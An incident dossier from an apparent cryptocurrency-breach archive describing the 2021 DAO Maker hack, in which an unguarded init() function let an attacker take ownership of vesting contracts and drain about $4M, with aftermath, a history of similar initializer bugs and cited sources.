Skip to content
Est. MMXXVIVol. VI · № 273RSS
Blockchain Breaches

An archive of cryptocurrency security incidents — hacks, exploits, bridge failures and rug pulls, documented with on-chain evidence.

Dossier № 054Smart Contract Bug

DAO Maker Unprotected Init

An unprotected init() function in DAO Maker's vesting contracts let an attacker seize ownership and call emergencyExit, draining $4M across multiple user pools.

Date
Victim
DAO Maker
Chain(s)
Ethereum
Status
Funds Stolen

On September 3, 2021, the launchpad and token-distribution platform DAO Maker lost approximately $4 million affecting roughly 5,251 users. An unprotected init() function on DAO Maker's distribution contracts let the attacker re-initialize the contract, seize ownership, and call an emergency-withdraw function to drain user funds.

What happened

DAO Maker ran token-sale and vesting infrastructure — users' allocated tokens and contributed funds were held in distribution contracts pending vesting schedules.

The fatal flaw was the canonical re-invokable-initializer bug: the distribution contract's init() function — which set the contract's owner and critical parameters — had no guard against being called a second time.

The attack:

  1. Called init() on an already-deployed, funded distribution contract, passing parameters that set the attacker as the contract owner.
  2. With ownership seized, called the contract's emergencyExit / privileged withdrawal function — legitimately available to the owner — to transfer user funds out.
  3. Repeated across affected pools, draining approximately $4M.

Aftermath

  • DAO Maker acknowledged the breach and committed to compensating affected users from corporate reserves and treasury.
  • The compromised contracts were retired and replaced with properly-guarded versions.
  • The stolen funds were laundered; no public recovery.

Why it matters

DAO Maker is one more entry in the re-invokable initializer lineage — the single most-repeated catastrophic Solidity pattern in the catalogue:

  • Parity Multisig (2017) — re-invokable initWallet, $30M stolen + $150M frozen.
  • DODO (Mar 2021) — re-invokable init() on Crowdpools.
  • Punk Protocol (Aug 2021) — re-invokable Initialize() via delegatecall.
  • DAO Maker (Sep 2021) — unprotected init(), ownership seizure.
  • Audius (2022) — re-invokable governance initializer.

Five-plus years of the exact same bug class, each instance costing millions, despite the mitigation being a single well-documented one-line modifier (OpenZeppelin's initializer). The recurrence is the lesson: knowing about a vulnerability class as an industry does not prevent individual teams from shipping it. Every new upgradeable contract, written by a team that may not have internalised the Parity/DODO/Punk history, is a fresh opportunity to omit the guard.

DAO Maker is also notable for the user-count impact — ~5,251 affected users — illustrating that launchpad/distribution platforms concentrate many individual users' funds into shared contracts, so a single initializer bug becomes a many-thousand-victim event rather than a single-protocol-treasury loss. The blast radius of the bug class scales with how much user money the vulnerable contract custodies, and distribution platforms custody a lot.

Sources & on-chain evidence

  1. [01]halborn.comhttps://www.halborn.com/blog/post/explained-the-dao-maker-hack-september-2021
  2. [02]newsweek.comhttps://www.newsweek.com/dao-maker-hack-7m-stolen-defi-heist-1618785
  3. [03]rekt.newshttps://rekt.news/daomaker-rekt

Related filings